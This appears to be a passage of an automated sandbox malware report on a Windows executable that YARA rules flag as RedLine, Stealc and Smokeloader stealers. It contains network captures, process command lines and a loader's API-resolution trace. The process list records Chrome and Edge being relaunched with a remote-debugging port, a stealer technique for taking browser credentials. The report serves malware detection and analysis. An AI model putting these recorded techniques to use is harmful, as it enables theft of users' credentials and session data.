!1:s_qI2AUdtu.7P"jvalU.r,Fh#A(2`41iZ3[Z7x)p-_&maW3!"N2l-c>o.uvs>i`a71W_}i+q3Q%4kBq@ZcF
2024-11-09 01:47:38 UTC	16384	IN	Data Raw: 97 07 f0 a0 b3 d4 63 70 c6 06 32 d2 d0 7d c7 c9 75 46 6c 40 b5 30 3a 14 c3 2d b7 b8 36 3a ac e3 7e d2 8e 7d 43 58 db 34 83 56 e7 60 34 00 40 bf 34 de f8 89 5e 56 57 03 70 ef 0d 50 d9 93 b8 07 97 06 9d e3 7f 00 53 0f 77 a2 ec d2 e0 74 fb a5 3e a1 cd 27 62 bc d2 f2 6d 28 98 fb cc 74 13 f9 2a 27 bb b2 65 d7 c5 27 fb 06 d0 9b 27 4d 3f 35 5e 7b 81 05 6a 47 3b d5 63 73 de 5d 8a 65 b0 08 11 50 aa fd 1b b9 1d 4a f3 9c e0 50 cb 88 43 95 a9 1c ad d3 97 6c 12 54 52 eb 74 b2 b4 c1 a5 42 52 ca e4 41 f1 b8 07 34 b8 54 01 04 8d a4 74 b7 55 b4 e5 0f 73 9c d1 ed b4 93 0d 04 90 d1 a0 93 7b 2f 2a 53 87 14 6a 57 a8 1c 0a b5 4b 85 96 5c 7e a7 23 31 3f 08 a6 9c 85 ae 74 b4 55 db 31 0e 8a 80 bd c0 37 4f 8d c1 a4 97 09 11 b0 31 7d 34 28 d6 b6 dc 7e 4a 90 4c 40 9e 17 48 1e d2 d2 Data Ascii: cp2}uFl@0:-6:~}CX4V`4@4^VWpPSwt>'bm(t'e''M?5^{jG;cs]ePJPClTRtBRA4TtUs{/SjWK\~#1?tU17O1}4(~JL@H
2024-11-09 01:47:38 UTC	7952	IN	Data Raw: 18 9f d5 37 b6 fe a1 7a 10 a4 14 f6 31 e7 fb 4e ea 14 f6 9d d4 2d f0 ee 4a 41 4f 64 c8 c1 ed 3b f5 0f 9a ef 64 f5 fa af 42 1d d1 aa 52 7a 0f 92 7b 0f 3f db e6 bb db e6 bd 0a 7f b4 79 ae a4 7e 91 e6 13 d8 c7 9f ed ab ed 1f c0 bd 0a 47 e9 1e 61 5f 0f a7 f0 9e c6 3c df 68 fe 05 3d a3 cf c9 7a b1 3a 7d 17 40 fd 3f 44 f6 31 e5 7b 27 9f 92 ef 65 dc d7 ad 48 fd 2a 80 3f 4f d1 3d 8c 79 1e cb ba 1f 25 de cb ba 15 eb c3 7a 7e 79 ab 43 3a 7e 79 a7 b5 31 e3 fb 4e 4e 31 bd 7a 87 1b 3f 4f d7 f9 5d ed e3 e9 f9 e6 9e d4 c7 9b ed bf a7 c9 77 b7 93 a2 f4 7d bc 7f a7 f3 cd 5f 6b 1f 4f af f2 9e d4 c7 9b ed e4 e8 bb da c9 d1 7a 7e de 3f d3 f5 fe 53 7b 2c fd 07 e7 fc ac fb 2e 3c cf 69 ff 00 a7 e4 a1 c2 e3 fb 7e 4b d5 f6 59 bd 27 f3 c5 37 b3 8f f4 fe 79 a7 b5 3d 5e 3f fa ef e8 Data Ascii: 7z1N-JAOd;dBRz{?y~Ga_<h=z:}@?D1{'eH*?O=y%z~yC:~y1NN1z?O]w}_kOz~?S{,.<i~KY'7y=^?
2024-11-09 01:47:38 UTC	6096	IN	Data Raw: 9d ad 6f 44 56 b4 e8 4a 9a d4 3f b1 96 6e 4f 3d 6e b4 35 8e 99 2e 74 6c 79 23 43 c8 15 c7 27 0e 9d 4a 0b dd 41 ea 3c 7a 2a e8 3b 6b 00 82 44 1f ce a9 5d 8c 3a d1 7d 23 9e b7 43 61 0d 26 6a be c3 44 d1 94 36 6a 2d d3 79 e2 a3 44 6e 06 00 e9 71 91 c2 ff 00 64 8d f4 f4 99 92 44 10 64 a2 51 9b e0 6e b2 67 6f aa 5a 7d 4d 13 0e da fa de 54 3f fc a9 c4 c7 46 bb 10 52 65 63 b5 e1 73 61 08 e3 1b e9 20 9a 6d 33 f6 41 2d 78 1b 4c 5e ff 00 3f e1 4d 33 8f 04 6b 3f f4 da c6 d3 e0 88 ff 00 75 cc 86 b5 a6 2c 7f 51 e6 83 ef 38 b8 b5 ac bc 18 1b c6 b2 9c 1c af 1d c2 91 13 56 d2 a3 3f dc a3 1e 41 63 6d 6d bf c9 17 dc cc 05 4d 37 d8 ce e4 42 8d a8 12 d6 ba 64 ed b9 e8 9c 92 4b 81 73 8d b9 75 da ca 2c 9c 33 8c 8f c6 36 69 bd cc 6f 1c 11 06 6f 70 c1 ac 49 dc 4f cf fc a2 d4 1a Data Ascii: oDVJ?nO=n5.tly#C'JA<z*;kD]:}#Ca&jD6j-yDnqdDdQngoZ}MT?FRecsa m3A-xL^?M3k?u,Q8V?AcmmM7BdKsu,36ioopIO

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.7	53073	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:37 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:37 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:37 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014737Z-16547b76f7f4k79zhC1DFWu9y00000000akg000000004c4w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:37 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.7	53074	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:37 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:37 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:37 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014737Z-16547b76f7fcrtpchC1DFW52e80000000amg000000000wfu x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:37 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.7	53075	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:37 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:37 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:37 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: e0f9c939-d01e-0049-47d2-2ce7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014737Z-16547b76f7fsjlq8hC1DFWehq00000000a6g00000000g6qt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:37 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.7	53078	23.198.7.184	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:37 UTC	628	OUT	OPTIONS /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1 Host: www.bing.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: x-personalbing-csrf,x-personalbing-flights,x-search-clientid,x-search-uilang Origin: https://ntp.msn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:37 UTC	2233	IN	HTTP/1.1 200 OK Content-Length: 0 Access-Control-Allow-Headers: * Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Max-Age: 7200 Cache-Control: private X-EventID: 672ebf39a6524b418adb69667ecf081d UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ecWglAW4unpsne5m7ZF1AIf1NowFR+PBIDPCQhVhRNY='; base-uri 'self';report-to csp-endpoint Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]} P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Sat, 09 Nov 2024 01:47:37 GMT Connection: close Set-Cookie: MUID=0AFDE505ECDA614D31DEF037EDAB6030; domain=.bing.com; expires=Thu, 04-Dec-2025 01:47:37 GMT; path=/; secure; SameSite=None Set-Cookie: MUIDB=0AFDE505ECDA614D31DEF037EDAB6030; expires=Thu, 04-Dec-2025 01:47:37 GMT; path=/; HttpOnly Set-Cookie: _EDGE_S=F=1&SID=37110A11E3B0653124321F23E2C1644D; domain=.bing.com; path=/; HttpOnly Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 04-Dec-2025 01:47:37 GMT; path=/; HttpOnly Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 09-Nov-2026 01:47:37 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 09-Nov-2026 01:47:37 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUID=V=2&GUID=DAC322D363604EF7B1D6AB19A928F768&dmnchg=1; domain=.bing.com; expires=Mon, 09-Nov-2026 01:47:37 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUSR=DOB=20241109; domain=.bing.com; expires=Mon, 09-Nov-2026 01:47:37 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 09-Nov-2026 01:47:37 GMT; path=/; secure; SameSite=None Set-Cookie: _SS=SID=37110A11E3B0653124321F23E2C1644D; domain=.bing.com; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.a83a2f17.1731116857.ab73632

Target ID:	0
Start time:	20:47:03
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\HrxOpVxK5d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HrxOpVxK5d.exe"
Imagebase:	0x400000
File size:	696'320 bytes
MD5 hash:	C4AC7A7EE7A9529B0148D9A64C43801B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1775076444.0000000002CC2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:47:10
Start date:	08/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:47:11
Start date:	08/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2340,i,8805815916245064741,14049672499791549619,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:47:22
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:47:23
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=2556,i,10855429805949803760,7672887330153088567,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:47:23
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	20:47:23
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	22:33:27
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6980 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:33:27
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7132 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:33:41
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 2436
Imagebase:	0x6b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:34:23
Start date:	08/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5308 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,02D3B438), ref: 00419F3D
GetProcAddress.KERNEL32(77190000,02D3B4B8), ref: 00419F55
GetProcAddress.KERNEL32(77190000,02D3E688), ref: 00419F6E
GetProcAddress.KERNEL32(77190000,02D3E6B8), ref: 00419F86
GetProcAddress.KERNEL32(77190000,02D3E550), ref: 00419F9E
GetProcAddress.KERNEL32(77190000,02D3E718), ref: 00419FB7
GetProcAddress.KERNEL32(77190000,02D40590), ref: 00419FCF
GetProcAddress.KERNEL32(77190000,02D3E6E8), ref: 00419FE7
GetProcAddress.KERNEL32(77190000,02D3E760), ref: 0041A000
GetProcAddress.KERNEL32(77190000,02D3E748), ref: 0041A018
GetProcAddress.KERNEL32(77190000,02D3E778), ref: 0041A030
GetProcAddress.KERNEL32(77190000,02D3B4D8), ref: 0041A049
GetProcAddress.KERNEL32(77190000,02D3B538), ref: 0041A061
GetProcAddress.KERNEL32(77190000,02D3B178), ref: 0041A079
GetProcAddress.KERNEL32(77190000,02D3B238), ref: 0041A092
GetProcAddress.KERNEL32(77190000,02D3E730), ref: 0041A0AA
GetProcAddress.KERNEL32(77190000,02D3E790), ref: 0041A0C2
GetProcAddress.KERNEL32(77190000,02D40608), ref: 0041A0DB
GetProcAddress.KERNEL32(77190000,02D3B3F8), ref: 0041A0F3
GetProcAddress.KERNEL32(77190000,02D3E6D0), ref: 0041A10B
GetProcAddress.KERNEL32(77190000,02D3E700), ref: 0041A124
GetProcAddress.KERNEL32(77190000,02D44E58), ref: 0041A13C
GetProcAddress.KERNEL32(77190000,02D44DB0), ref: 0041A154
GetProcAddress.KERNEL32(77190000,02D3B258), ref: 0041A16D
GetProcAddress.KERNEL32(77190000,02D44F78), ref: 0041A185
GetProcAddress.KERNEL32(77190000,02D44CC0), ref: 0041A19D
GetProcAddress.KERNEL32(77190000,02D44EE8), ref: 0041A1B6
GetProcAddress.KERNEL32(77190000,02D44EA0), ref: 0041A1CE
GetProcAddress.KERNEL32(77190000,02D44F48), ref: 0041A1E6
GetProcAddress.KERNEL32(77190000,02D44CF0), ref: 0041A1FF
GetProcAddress.KERNEL32(77190000,02D44F00), ref: 0041A217
GetProcAddress.KERNEL32(77190000,02D44E70), ref: 0041A22F
GetProcAddress.KERNEL32(77190000,02D44F60), ref: 0041A248
GetProcAddress.KERNEL32(77190000,02D417C0), ref: 0041A260
GetProcAddress.KERNEL32(77190000,02D44D20), ref: 0041A278
GetProcAddress.KERNEL32(77190000,02D44FA8), ref: 0041A291
GetProcAddress.KERNEL32(77190000,02D3B298), ref: 0041A2A9
GetProcAddress.KERNEL32(77190000,02D44E88), ref: 0041A2C1
GetProcAddress.KERNEL32(77190000,02D3B2B8), ref: 0041A2DA
GetProcAddress.KERNEL32(77190000,02D44CD8), ref: 0041A2F2
GetProcAddress.KERNEL32(77190000,02D44D08), ref: 0041A30A
GetProcAddress.KERNEL32(77190000,02D3B418), ref: 0041A323
GetProcAddress.KERNEL32(77190000,02D3B3B8), ref: 0041A33B
LoadLibraryA.KERNEL32(02D44D38,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
LoadLibraryA.KERNEL32(02D44E10,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
LoadLibraryA.KERNEL32(02D44EB8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
LoadLibraryA.KERNEL32(02D44D50,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
LoadLibraryA.KERNEL32(02D44ED0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
LoadLibraryA.KERNEL32(02D44D68,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
LoadLibraryA.KERNEL32(02D44D80,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
LoadLibraryA.KERNEL32(02D44DC8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
GetProcAddress.KERNEL32(77040000,02D3B3D8), ref: 0041A3EA
GetProcAddress.KERNEL32(77040000,02D44F90), ref: 0041A402
GetProcAddress.KERNEL32(77040000,02D3E098), ref: 0041A41A
GetProcAddress.KERNEL32(77040000,02D44D98), ref: 0041A433
GetProcAddress.KERNEL32(77040000,02D3B458), ref: 0041A44B
GetProcAddress.KERNEL32(70530000,02D40798), ref: 0041A470
GetProcAddress.KERNEL32(70530000,02D3B8D8), ref: 0041A489
GetProcAddress.KERNEL32(70530000,02D407C0), ref: 0041A4A1
GetProcAddress.KERNEL32(70530000,02D44F30), ref: 0041A4B9
GetProcAddress.KERNEL32(70530000,02D44F18), ref: 0041A4D2
GetProcAddress.KERNEL32(70530000,02D3B798), ref: 0041A4EA
